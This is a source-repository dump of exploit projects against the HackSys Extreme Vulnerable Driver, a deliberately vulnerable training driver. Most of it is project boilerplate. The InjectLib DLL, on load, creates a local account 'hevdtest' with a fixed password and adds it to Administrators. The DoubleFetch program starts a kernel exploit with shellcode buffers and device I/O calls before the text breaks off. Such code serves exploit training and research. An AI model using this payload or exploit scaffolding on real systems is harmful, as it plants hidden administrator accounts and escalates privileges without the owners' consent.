├── HEVD_Win10x64
├── ArbitraryIncrement
│ ├── App.config
│ ├── ArbitraryIncrement.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ArbitraryReadWrite
│ ├── App.config
│ ├── ArbitraryReadWrite.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ArbitraryWrite
│ ├── App.config
│ ├── ArbitraryWrite.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── HEVD_Win10x64.sln
├── InjectLib
│ ├── InjectLib.vcxproj
│ ├── InjectLib.vcxproj.filters
│ ├── InjectLib.vcxproj.user
│ ├── dllmain.cpp
│ ├── framework.h
│ ├── pch.cpp
│ └── pch.h
└── InsecureKernelResourceAccess
│ ├── App.config
│ ├── InsecureKernelResourceAccess.csproj
│ ├── Program.cs
│ └── Properties
│ └── AssemblyInfo.cs
├── HEVD_Win7x86
├── DoubleFetch
│ ├── App.config
│ ├── DoubleFetch.csproj
│ ├── DoubleFetch.csproj.user
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── HEVD_Win7x86.sln
├── InjectLib
│ ├── InjectLib.vcxproj
│ ├── InjectLib.vcxproj.filters
│ ├── InjectLib.vcxproj.user
│ ├── dllmain.cpp
│ ├── framework.h
│ ├── pch.cpp
│ └── pch.h
├── InsecureKernelResourceAccess
│ ├── InsecureKernelResourceAccess.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── IntegerOverflow
│ ├── App.config
│ ├── IntegerOverflow.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── NullPointerDereference
│ ├── App.config
│ ├── NullPointerDereference.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PoolOverflow
│ ├── App.config
│ ├── PoolOverflow.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── StackOverflow
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── StackOverflow.csproj
├── StackOverflowGS
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── StackOverflowGS.csproj
├── TypeConfusion
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── TypeConfusion.csproj
├── UninitializedHeapVariable
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── UninitializedHeapVariable.csproj
├── UninitializedStackVariable
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── UninitializedStackVariable.csproj
├── UseAfterFree
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── UseAfterFree.csproj
├── WriteNull
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── WriteNull.csproj
├── WriteWhatWhere
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── WriteWhatWhere.csproj
└── WriteWhatWhereGDI
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ └── AssemblyInfo.cs
│ └── WriteWhatWhereGDI.csproj
└── README.md
/HEVD_Win10x64/ArbitraryIncrement/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryIncrement/ArbitraryIncrement.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}
8 | Exe
9 | ArbitraryIncrement
10 | ArbitraryIncrement
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryIncrement/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ArbitraryIncrement")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ArbitraryIncrement")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3d31131a-2ecf-4a7b-a076-6f3f22c66b4f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryReadWrite/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryReadWrite/ArbitraryReadWrite.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {05C2FCB6-4797-4B79-AD16-F116986F171B}
8 | Exe
9 | ArbitraryReadWrite
10 | ArbitraryReadWrite
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryReadWrite/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ArbitraryReadWrite")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ArbitraryReadWrite")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("05c2fcb6-4797-4b79-ad16-f116986f171b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryWrite/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryWrite/ArbitraryWrite.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}
8 | Exe
9 | ArbitraryWrite
10 | ArbitraryWrite
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryWrite/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ArbitraryWrite")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ArbitraryWrite")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("fadc67ed-bee2-4875-9bd0-101c9b084a1c")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/HEVD_Win10x64.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31729.503
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectLib", "InjectLib\InjectLib.vcxproj", "{CCC9A18A-F932-4A09-B618-6701C16874D2}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "InsecureKernelResourceAccess", "InsecureKernelResourceAccess\InsecureKernelResourceAccess.csproj", "{C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ArbitraryReadWrite", "ArbitraryReadWrite\ArbitraryReadWrite.csproj", "{05C2FCB6-4797-4B79-AD16-F116986F171B}"
11 | EndProject
12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ArbitraryWrite", "ArbitraryWrite\ArbitraryWrite.csproj", "{FADC67ED-BEE2-4875-9BD0-101C9B084A1C}"
13 | EndProject
14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ArbitraryIncrement", "ArbitraryIncrement\ArbitraryIncrement.csproj", "{3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}"
15 | EndProject
16 | Global
17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
18 | Debug|x64 = Debug|x64
19 | Release|x64 = Release|x64
20 | EndGlobalSection
21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
22 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Debug|x64.ActiveCfg = Debug|x64
23 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Debug|x64.Build.0 = Debug|x64
24 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Release|x64.ActiveCfg = Release|x64
25 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Release|x64.Build.0 = Release|x64
26 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Debug|x64.ActiveCfg = Debug|x64
27 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Debug|x64.Build.0 = Debug|x64
28 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Release|x64.ActiveCfg = Release|x64
29 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Release|x64.Build.0 = Release|x64
30 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Debug|x64.ActiveCfg = Debug|x64
31 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Debug|x64.Build.0 = Debug|x64
32 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Release|x64.ActiveCfg = Release|x64
33 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Release|x64.Build.0 = Release|x64
34 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Debug|x64.ActiveCfg = Debug|x64
35 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Debug|x64.Build.0 = Debug|x64
36 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Release|x64.ActiveCfg = Release|x64
37 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Release|x64.Build.0 = Release|x64
38 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Debug|x64.ActiveCfg = Debug|x64
39 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Debug|x64.Build.0 = Debug|x64
40 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Release|x64.ActiveCfg = Release|x64
41 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Release|x64.Build.0 = Release|x64
42 | EndGlobalSection
43 | GlobalSection(SolutionProperties) = preSolution
44 | HideSolutionNode = FALSE
45 | EndGlobalSection
46 | GlobalSection(ExtensibilityGlobals) = postSolution
47 | SolutionGuid = {969CE67D-56DE-4CC4-B652-0776D31111C5}
48 | EndGlobalSection
49 | EndGlobal
50 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/InjectLib.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {ccc9a18a-f932-4a09-b618-6701c16874d2}
25 | InjectLib
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 | $(SolutionDir)bin\$(Platform)\$(Configuration)\
82 |
83 |
84 | false
85 | $(SolutionDir)bin\$(Platform)\$(Configuration)\
86 |
87 |
88 |
89 | Level3
90 | true
91 | WIN32;_DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
92 | true
93 | Use
94 | pch.h
95 |
96 |
97 | Windows
98 | true
99 | false
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | WIN32;NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
109 | true
110 | Use
111 | pch.h
112 |
113 |
114 | Windows
115 | true
116 | true
117 | true
118 | false
119 |
120 |
121 |
122 |
123 | Level3
124 | true
125 | _DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
126 | true
127 | Use
128 | pch.h
129 |
130 |
131 | Windows
132 | true
133 | false
134 |
135 |
136 |
137 |
138 | Level3
139 | true
140 | true
141 | true
142 | NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
143 | true
144 | Use
145 | pch.h
146 |
147 |
148 | Windows
149 | true
150 | true
151 | true
152 | false
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Create
163 | Create
164 | Create
165 | Create
166 |
167 |
168 |
169 |
170 |
171 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/InjectLib.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/InjectLib.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 |
3 | extern "C" {
4 | __declspec(dllexport) BOOL ExecuteCommand(wchar_t cmd[])
5 | {
6 | wchar_t currentDirectory[] = L"C:\\Windows\\System32";
7 | STARTUPINFO si;
8 | PROCESS_INFORMATION pi;
9 |
10 | ZeroMemory(&si, sizeof(si));
11 | si.cb = sizeof(si);
12 | ZeroMemory(&pi, sizeof(pi));
13 |
14 | BOOL status = ::CreateProcess(
15 | NULL,
16 | cmd,
17 | NULL,
18 | NULL,
19 | FALSE,
20 | CREATE_NEW_CONSOLE,
21 | NULL,
22 | currentDirectory,
23 | &si,
24 | &pi);
25 |
26 | if (status)
27 | {
28 | ::WaitForSingleObject(pi.hProcess, -1);
29 | ::CloseHandle(pi.hProcess);
30 | ::CloseHandle(pi.hThread);
31 | }
32 |
33 | return status;
34 | }
35 | }
36 |
37 | BOOL APIENTRY DllMain(HMODULE hModule,
38 | DWORD dwReason,
39 | LPVOID lpReserved
40 | ) {
41 | if (dwReason == DLL_PROCESS_ATTACH)
42 | {
43 | wchar_t adduser[] = L"C:\\Windows\\System32\\net.exe user hevdtest Password123! /add";
44 | wchar_t addgroup[] = L"C:\\Windows\\System32\\net.exe localgroup Administrators hevdtest /add";
45 | ExecuteCommand(adduser);
46 | ExecuteCommand(addgroup);
47 | }
48 | return TRUE;
49 | }
50 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InsecureKernelResourceAccess/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InsecureKernelResourceAccess/InsecureKernelResourceAccess.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}
8 | Exe
9 | InsecureKernelResourceAccess
10 | InsecureKernelResourceAccess
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InsecureKernelResourceAccess/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("InsecureKernelResourceAccess")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("InsecureKernelResourceAccess")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c0b187e5-0bbd-4bc4-b48c-72cb412b05a7")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/DoubleFetch.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}
8 | Exe
9 | DoubleFetch
10 | DoubleFetch
11 | v2.0
12 | 512
13 | true
14 |
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 | true
33 | ..\bin\x86\Debug\
34 | DEBUG;TRACE
35 | full
36 | x86
37 | prompt
38 | MinimumRecommendedRules.ruleset
39 | true
40 |
41 |
42 | ..\bin\x86\Release\
43 | TRACE
44 | true
45 | pdbonly
46 | x86
47 | prompt
48 | MinimumRecommendedRules.ruleset
49 | true
50 |
51 |
52 | DoubleFetch.Program
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 | False
69 | .NET Framework 3.5 SP1
70 | true
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/DoubleFetch.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | publish\
5 |
6 |
7 |
8 |
9 |
10 | en-US
11 | false
12 |
13 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 | using System.Threading;
5 |
6 | namespace DoubleFetch
7 | {
8 | class Program
9 | {
10 | [StructLayout(LayoutKind.Sequential)]
11 | struct DOUBLE_FETCH
12 | {
13 | public IntPtr Buffer;
14 | public int Size;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential)]
18 | struct SECURITY_ATTRIBUTES
19 | {
20 | public int nLength;
21 | public IntPtr lpSecurityDescriptor;
22 | public int bInheritHandle;
23 | }
24 |
25 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
26 | struct STARTUPINFO
27 | {
28 | public int cb;
29 | public string lpReserved;
30 | public string lpDesktop;
31 | public string lpTitle;
32 | public int dwX;
33 | public int dwY;
34 | public int dwXSize;
35 | public int dwYSize;
36 | public int dwXCountChars;
37 | public int dwYCountChars;
38 | public int dwFillAttribute;
39 | public int dwFlags;
40 | public short wShowWindow;
41 | public short cbReserved2;
42 | public IntPtr lpReserved2;
43 | public IntPtr hStdInput;
44 | public IntPtr hStdOutput;
45 | public IntPtr hStdError;
46 | }
47 |
48 | [StructLayout(LayoutKind.Sequential)]
49 | struct PROCESS_INFORMATION
50 | {
51 | public IntPtr hProcess;
52 | public IntPtr hThread;
53 | public int dwProcessId;
54 | public int dwThreadId;
55 | }
56 |
57 | [DllImport("ntdll.dll")]
58 | static extern void RtlGetNtVersionNumbers(
59 | ref int MajorVersion,
60 | ref int MinorVersion,
61 | ref int BuildNumber);
62 |
63 | [DllImport("kernel32.dll", SetLastError=true)]
64 | static extern IntPtr VirtualAlloc(
65 | IntPtr lpAddress,
66 | uint dwSize,
67 | uint flAllocationType,
68 | uint flProtect);
69 |
70 | [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
71 | static extern IntPtr CreateFile(
72 | string lpFileName,
73 | uint dwDesiredAccess,
74 | uint dwShareMode,
75 | IntPtr lpSecurityAttributes,
76 | uint dwCreationDisposition,
77 | uint dwFlagsAndAttributes,
78 | IntPtr hTemplateFile);
79 |
80 | [DllImport("kernel32.dll", SetLastError=true)]
81 | static extern bool DeviceIoControl(
82 | IntPtr hDevice,
83 | uint dwIoControlCode,
84 | ref DOUBLE_FETCH InBuffer,
85 | int nInBufferSize,
86 | IntPtr OutBuffer,
87 | int nOutBufferSize,
88 | ref int pBytesReturned,
89 | IntPtr lpOverlapped);
90 |
91 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)]
92 | static extern bool CreateProcess(
93 | string lpApplicationName,
94 | string lpCommandLine,
95 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
96 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
97 | bool bInheritHandles,
98 | uint dwCreationFlags,
99 | IntPtr lpEnvironment,
100 | string lpCurrentDirectory,
101 | ref STARTUPINFO lpStartupInfo,
102 | out PROCESS_INFORMATION lpProcessInformation);
103 |
104 | [DllImport("kernel32.dll", SetLastError=true)]
105 | static extern bool CloseHandle(IntPtr hObject);
106 |
107 | [DllImport("kernel32.dll", SetLastError = true)]
108 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
109 |
110 | // Global valiables
111 | static IntPtr ShellcodeBuffer = IntPtr.Zero;
112 | static IntPtr PayloadBuffer = IntPtr.Zero;
113 | static DOUBLE_FETCH DoubleFetch = new DOUBLE_FETCH();
114 | static IntPtr hDevice = IntPtr.Zero;
115 |
116 | // Helper functions
117 | static void CleanUp()
118 | {
119 | Console.WriteLine("[>] Cleaning up handle object(s)");
120 | if (hDevice != IntPtr.Zero)
121 | {
122 | if (CloseHandle(hDevice))
123 | {
124 | hDevice = IntPtr.Zero;
125 | }
126 | else
127 | {
128 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
129 | }
130 | }
131 | }
132 |
133 | static bool IsWin7x86()
134 | {
135 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
136 | int MajorVersion = 0;
137 | int MinorVersion = 0;
138 | int BuildNumber = 0;
139 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
140 | BuildNumber &= 0xFFFF;
141 |
142 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
143 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
144 | {
145 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
146 | return true;
147 | }
148 | else
149 | {
150 | Console.WriteLine("[-] Unsupported OS is detected");
151 | return false;
152 | }
153 | }
154 |
155 | static bool IsSystem()
156 | {
157 | string user = Environment.UserName;
158 |
159 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
